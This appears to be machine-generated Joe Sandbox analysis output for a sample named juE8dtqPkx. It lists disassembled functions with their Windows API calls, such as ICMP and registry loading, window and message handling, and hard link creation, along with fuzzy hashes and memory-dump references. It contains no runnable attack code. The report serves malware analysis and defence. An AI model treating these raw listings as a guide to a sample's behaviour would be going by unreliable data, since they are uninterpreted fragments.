                                                    • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                    • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                                    APIs
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                    • GetMenuItemInfoW.USER32 ref: 00449727
                                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                                    • DrawMenuBar.USER32 ref: 00449761
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Menu$InfoItem$Draw_malloc
                                                    • String ID: 0
                                                    • API String ID: 772068139-4108050209
                                                    • Opcode ID: 4412252fe0bb34e9c551b06fe095adc5aa4849453a321eb16ccca2d465028982
                                                    • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                                    • Opcode Fuzzy Hash: 4412252fe0bb34e9c551b06fe095adc5aa4849453a321eb16ccca2d465028982
                                                    • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$_wcscpy
                                                    • String ID: 3, 3, 8, 1
                                                    • API String ID: 3469035223-357260408
                                                    • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                    • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                                                    • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                    • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                                    • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: ICMP.DLL$IcmpCloseHandle
                                                    • API String ID: 2574300362-3530519716
                                                    • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                    • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                                    • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                    • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                                    • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: ICMP.DLL$IcmpCreateFile
                                                    • API String ID: 2574300362-275556492
                                                    • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                    • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                                    • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                    • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                                    • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: ICMP.DLL$IcmpSendEcho
                                                    • API String ID: 2574300362-58917771
                                                    • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                    • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                                    • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                    • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                                    APIs
                                                    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                    • API String ID: 2574300362-4033151799
                                                    • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                    • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                                    • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                    • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                    • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
                                                    • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                    • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 0047950F
                                                    • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                                    • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                                    • VariantClear.OLEAUT32(?), ref: 00479650
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Variant$AllocClearCopyInitString
                                                    • String ID:
                                                    • API String ID: 2808897238-0
                                                    • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                    • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                                    • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                    • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                                    APIs
                                                    • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                                    • __itow.LIBCMT ref: 004699CD
                                                      • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                                    • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                                    • __itow.LIBCMT ref: 00469A97
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$__itow
                                                    • String ID:
                                                    • API String ID: 3379773720-0
                                                    • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                    • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                                    • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                    • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                                    APIs
                                                    • GetWindowRect.USER32(?,?), ref: 00449A4A
                                                    • ScreenToClient.USER32(?,?), ref: 00449A80
                                                    • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Window$ClientMoveRectScreen
                                                    • String ID:
                                                    • API String ID: 3880355969-0
                                                    • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                    • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                                    • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                    • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                                    APIs
                                                    • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                    • GetWindowRect.USER32(?,?), ref: 00441722
                                                    • PtInRect.USER32(?,?,?), ref: 00441734
                                                    • MessageBeep.USER32(00000000), ref: 004417AD
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                    • String ID:
                                                    • API String ID: 1352109105-0
                                                    • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                    • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                                    • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                    • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                                    APIs
                                                    • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                                    • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                                    • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                                    • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                    • String ID:
                                                    • API String ID: 3321077145-0
                                                    • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                    • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                                    • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                    • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                                    APIs
                                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                                    • __isleadbyte_l.LIBCMT ref: 004208A6
                                                    • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                                    • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                    • String ID:
                                                    • API String ID: 3058430110-0
                                                    • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                    • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                                    • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                    • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                                    APIs
                                                    • GetParent.USER32(?), ref: 004503C8
                                                    • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                                    • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                                    • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Proc$Parent
                                                    • String ID:
                                                    • API String ID: 2351499541-0
                                                    • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                    • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                                    • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                    • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                                    APIs
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                                    • TranslateMessage.USER32(?), ref: 00442B01
                                                    • DispatchMessageW.USER32(?), ref: 00442B0B
                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Message$Peek$DispatchTranslate
                                                    • String ID:
                                                    • API String ID: 1795658109-0
                                                    • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                    • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                                    • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                    • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                                    APIs
                                                    • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                                      • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                      • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                      • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                    • GetCaretPos.USER32(?), ref: 004743B2
                                                    • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                                    • GetForegroundWindow.USER32 ref: 004743EE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
